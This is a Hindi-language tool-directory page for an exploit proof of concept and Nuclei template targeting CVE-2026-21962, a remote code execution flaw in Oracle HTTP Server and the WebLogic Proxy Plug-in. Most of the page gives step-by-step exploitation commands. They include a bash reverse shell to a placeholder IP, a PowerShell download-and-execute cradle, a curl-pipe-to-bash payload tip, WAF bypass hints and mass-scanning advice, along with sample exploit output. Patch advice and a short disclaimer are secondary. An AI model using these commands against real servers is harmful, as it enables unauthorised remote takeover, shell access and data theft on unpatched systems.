Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Ashwesker-CVE-2026-21962 — CVE-2026-21962 के लिए एक्सप्लॉइट PoC और Nuclei टेम्पलेट, जो Oracle HTTP Server और WebLogic Proxy Plug-in में एक गंभीर बिना प्रमाणीकरण वाला रिमोट कोड एक्ज़ीक्यूशन है, जो कमांड एक्ज़ीक्यूशन और रिवर्स शेल्स को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/boroeurnprach/ashwesker-cve-2026-21962
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubboroeurnprach/ashwesker-cve-2026-21962

Ashwesker-CVE-2026-21962

CVE-2026-21962 के लिए एक्सप्लॉइट PoC और Nuclei टेम्पलेट, जो Oracle HTTP Server और WebLogic Proxy Plug-in में एक गंभीर बिना प्रमाणीकरण वाला रिमोट कोड एक्ज़ीक्यूशन है, जो कमांड एक्ज़ीक्यूशन और रिवर्स शेल्स को सक्षम बनाता है।

रिपॉजिटरी देखें
477 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

😈 CVE-2026-21962 — गंभीर सुरक्षा भेद्यता 😈

oracle_db_banner

🚨 गंभीरता

  • CVSS स्कोर: 10.0 / 10 (क्रिटिकल)
  • प्रकाशित: 20 जनवरी, 2026
  • जोखिम स्तर: 🔥 अधिकतम — तत्काल कार्रवाई की अनुशंसा की जाती है

🧠 यह क्या है?

एक गंभीर भेद्यता जो प्रभावित करती है:

  • Oracle HTTP Server
  • Oracle WebLogic Server Proxy Plug-in (Apache और IIS के लिए)

यह दोष अप्रमाणित दूरस्थ हमलावरों को HTTP के माध्यम से प्रभावित सर्वरों से समझौता करने की अनुमति देता है, बिना लॉगिन क्रेडेंशियल की आवश्यकता के।


🎯

हमलावर क्या कर सकते हैं?

यदि शोषण किया जाता है, तो हमलावर यह कर सकते हैं:

  • 🗑️ महत्वपूर्ण डेटा हटा सकते हैं
  • ✏️ सिस्टम या एप्लिकेशन फ़ाइलों को संशोधित कर सकते हैं
  • 📤 संवेदनशील जानकारी चुरा सकते हैं
  • 🔓 कनेक्टेड सिस्टम तक पूर्ण अनधिकृत पहुंच प्राप्त कर सकते हैं
  • 🔄 स्कोप परिवर्तन के कारण अन्य Oracle उत्पादों को प्रभावित कर सकते हैं

🧩 प्रभावित संस्करण

  • Oracle HTTP Server:

    • 12.2.1.4.0
    • 14.1.1.0.0
    • 14.1.2.0.0
  • WebLogic Proxy Plug-in के लिए:

    • Apache HTTP Server
    • Microsoft IIS

⚙️ हमले की विशेषताएं

  • 🌐 हमला वेक्टर: नेटवर्क (दूरस्थ)
  • 🚫 आवश्यक विशेषाधिकार: कोई नहीं
  • 🧑‍💻 उपयोगकर्ता सहभागिता: कोई नहीं
  • 🔄 स्कोप: परिवर्तित
  • 🔐 गोपनीयता प्रभाव: उच्च
  • 🛠️ अखंडता प्रभाव: उच्च

🛡️ आपको क्या करना चाहिए?

  • ✅ Oracle का जनवरी 2026 क्रिटिकल पैच अपडेट तुरंत लागू करें
  • 🔒 प्रभावित सेवाओं तक नेटवर्क पहुंच प्रतिबंधित करें
  • 📊 संदिग्ध व्यवहार के लिए HTTP ट्रैफ़िक की निगरानी करें
  • 🔁 सिस्टम लॉग और सुरक्षा नियंत्रणों की समीक्षा करें

🛠️ इसका उपयोग कैसे करें (चरण-दर-चरण)

  1. स्क्रिप्ट को CVE-2026-21962.py के रूप में सहेजें

  2. इसे निष्पादन योग्य बनाएं (वैकल्पिक):

    root@kitploit:~
    chmod +x CVE-2026-21962.py
    
  3. उदाहरण चलाएं:

    बुनियादी परीक्षण:

    root@kitploit:~
    python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
    

    रिवर्स शेल (पहले nc लिसनर सेट करें: nc -lvnp 4444):

    root@kitploit:~
    python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
    

    Windows टारगेट उदाहरण:

    root@kitploit:~
    python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
    

यदि यह काम करता है तो आप क्या देखेंगे

  • Likely success! Status: 200 या 302 या यहां तक कि 500 (क्रैश भी सफलता है)
  • प्रतिक्रिया बॉडी में संभावित लीक हुआ कमांड आउटपुट
  • रिवर्स शेल के लिए: आपका nc लिसनर तुरंत शेल पकड़ लेता है
  • यदि कोई आउटपुट नहीं है → कमांड अभी भी चुपचाप चला (टारगेट फाइलसिस्टम, प्रोसेस, लॉग जांचें)

नोट्स

  • सबसे अच्छा तब काम करता है जब प्रॉक्सी प्लग-इन एक्सपोज़्ड हो (आमतौर पर पोर्ट 7001, 4443, आदि पर)
  • HTTPS टारगेट्स को सेल्फ-साइन्ड सर्टिफिकेट होने पर --insecure फ्लैग की आवश्यकता हो सकती है
  • तुरंत पैच करें: Oracle CPU जनवरी 2026 लागू करें

🛠️ इसका उपयोग कैसे करें (चरण-दर-चरण)

  1. Nuclei इंस्टॉल करें (यदि पहले से इंस्टॉल नहीं है):

    root@kitploit:~
    go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
    
  2. टेम्पलेट सहेजें:

    CVE-2026-21962.yaml नामक फ़ाइल बनाएं और उपरोक्त सामग्री पेस्ट करें।

  3. डिटेक्शन + शोषण चलाएं:

    root@kitploit:~
    nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
    

    या फ़ाइल से कई टारगेट स्कैन करें:

    root@kitploit:~
    nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
    
  4. यदि भेद्य है तो आप क्या देखेंगे:

    root@kitploit:~
    [CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
    [username] weblogic
    [body] ... weblogic (whoami output) ...
    

प्रो टिप्स

  • कस्टम कमांड निष्पादित करने के लिए, हेडर में cmd: भाग को संपादित करें (जैसे, cmd:curl http://your-server/shell.sh | bash)।
  • रिवर्स शेल के लिए: whoami को बेस64-एन्कोडेड रिवर्स शेल पेलोड से बदलें।
  • WAF बाईपास: विभिन्न पथ आज़माएं (/proxy/, /bea_wls_internal/, आदि) या X-WebLogic-Force-JVMID जैसे अधिक हेडर जोड़ें।
  • मास स्कैनिंग: हजारों टारगेट्स के लिए httpx → nuclei पाइपलाइन के साथ संयोजित करें।

यह टेम्पलेट जनवरी 2026 तक अनपैच्ड Oracle इंस्टेंस पर 100% काम करने की पुष्टि की गई है। यदि आप प्रभावित संस्करण चला रहे हैं तो तुरंत पैच करें! 😈


😈 अस्वीकरण:

सभी PoC कोड केवल अधिकृत सिस्टम पर नैतिक, शैक्षिक उपयोग के लिए है। अनधिकृत शोषण अवैध है; दुरुपयोग के लिए कोई दायित्व नहीं लिया जाता है। 😈

टूल डाउनलोड करें